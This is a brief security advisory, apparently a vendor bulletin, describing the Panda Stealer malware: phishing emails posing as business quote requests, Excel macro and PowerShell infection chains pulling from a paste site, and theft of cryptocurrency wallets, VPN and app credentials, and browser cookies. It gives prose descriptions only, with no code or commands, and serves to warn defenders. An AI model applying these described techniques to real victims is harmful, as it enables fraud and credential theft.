The malware hones in on cryptocurrency funds as well as VPN credentials.
The malware begins its infection chain through phishing emails and samples uploaded to VirusTotal also indicate that victims have been downloading executables from malicious websites via Discord links.
Panda Stealer’s phishing emails pretend to be business quote requests.
What has happened?
According to Trend Micro researchers, the new stealer was discovered in April 2021. The most recent wave of the spam campaign had the biggest impact on Australia, Germany, Japan, and the U.S.
• The stealer is spreading via spam and phishing emails masquerading as business quote requests to fool victims into clicking on malicious Excel files. Two infection chains are spreading the stealer.
• The first one has an ‘.XLSM’ attachment with malicious macros that download a loader. Next, the loader downloads and executes the main stealer.
• The second method involves an attached .XLS file with an Excel formula that uses a PowerShell command to access a Pastebin alternative, paste[.]ee, that accesses the second encrypted PowerShell command.
Additional insights
• Researchers found 264 files similar to Panda Stealer on VirusTotal and some of them were being shared on Discord.
• In addition, the stealer uses the fileless distribution method of the Fair variant of the Phobos ransomware to avoid detection. CIEL INFORMATION CENTER PANDA STEALER Page 2 of 2
Post-infection activities Once Panda Stealer is successfully deployed, it tries to steal information such
as past transactions from cryptocurrency wallets, including Bytecoin, Dash,
Ethereum, and Litecoin.
• Moreover, it can steal credentials from applications, such as NordVPN, Telegram, Steam, and Discord.
• It can take screenshots of the infected system and swipe cookies and passwords from browsers.
Similarities with Collector Stealer
Panda Stealer is a modified version of Collector Stealer (aka DC Stealer) that is available on underground forums and Telegram for the price tag of $12. It’s promoted as a top-end stealer and comes with a Russian interface.
• A threat actor named NCP (aka su1c1de) has cracked Collector Stealer.
That stealer and Panda appear to behave similarly; however, they don’t share the same C2 URLs, build tags, or execution folders.
• Moreover, both Panda Stealer and Collector Stealer exfiltrate information such as web data, cookies, and login data from a compromised system and store them in an SQLite3 database.
Conclusion Cybercriminals modified the existing Collector Stealer malware by adding new features to make Panda Stealer more efficient. This makes it harder for organizations to detect and spot this malware. Therefore, organizations are recommended to use behavior-based solutions that detect malicious files and spam emails and block malicious URLs, and use Digital Certificates for Authentication purposes issued by a third neutral party called the CA – Certificate Authority.
For your information, we can assist you in this case and have the required
solutions at hand. Do contact us – we speak your language.
Info@ciel.com.lb – +961 1 285 666 – www.ciel.com.lb
17
May